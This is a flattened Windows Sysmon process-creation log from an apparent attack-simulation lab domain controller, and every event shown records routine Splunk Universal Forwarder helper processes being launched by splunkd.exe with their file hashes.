Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035321Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:21.661{A8622C2F-4DC1-6078-C906-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:20.995{A8622C2F-4DC0-6078-C806-00000000AE01}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000035302Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:20.328{A8622C2F-4DC0-6078-C706-00000000AE01}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:18.404{A8622C2F-4DBE-6078-C606-00000000AE01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:17.722{A8622C2F-4DBD-6078-C506-00000000AE01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:17.055{A8622C2F-4DBD-6078-C406-00000000AE01}5084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035182Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:22.856{A8622C2F-4D86-6078-C306-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000035167Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:21.538{A8622C2F-4D85-6078-C206-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:20.862{A8622C2F-4D84-6078-C106-00000000AE01}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:20.303{A8622C2F-4D84-6078-C006-00000000AE01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035094Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:18.375{A8622C2F-4D82-6078-BF06-00000000AE01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035084Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:17.710{A8622C2F-4D81-6078-BE06-00000000AE01}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000035075Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:17.035{A8622C2F-4D81-6078-BD06-00000000AE01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:22.850{A8622C2F-4D4A-6078-BC06-00000000AE01}2104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034972Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:21.579{A8622C2F-4D49-6078-BB06-00000000AE01}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:20.913{A8622C2F-4D48-6078-BA06-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034953Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:20.339{A8622C2F-4D48-6078-B906-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:27:18.426{A8622C2F-4D46-6078-B806-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:17.748{A8622C2F-4D45-6078-B706-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:17.082{A8622C2F-4D45-6078-B606-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034846Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:22.829{A8622C2F-4D0E-6078-B506-00000000AE01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:21.698{A8622C2F-4D0D-6078-B406-00000000AE01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:26:21.017{A8622C2F-4D0D-6078-B306-00000000AE01}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034804Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:20.412{A8622C2F-4D0C-6078-B206-00000000AE01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:18.407{A8622C2F-4D0A-6078-B106-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:17.746{A8622C2F-4D09-6078-B006-00000000AE01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:17.123{A8622C2F-4D09-6078-AF06-00000000AE01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000034601Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:22.820{A8622C2F-4CD2-6078-AE06-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034589Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:21.735{A8622C2F-4CD1-6078-AD06-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034579Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:21.066{A8622C2F-4CD1-6078-AC06-00000000AE01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034569Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:20.393{A8622C2F-4CD0-6078-AB06-00000000AE01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034558Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:18.412{A8622C2F-4CCE-6078-AA06-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
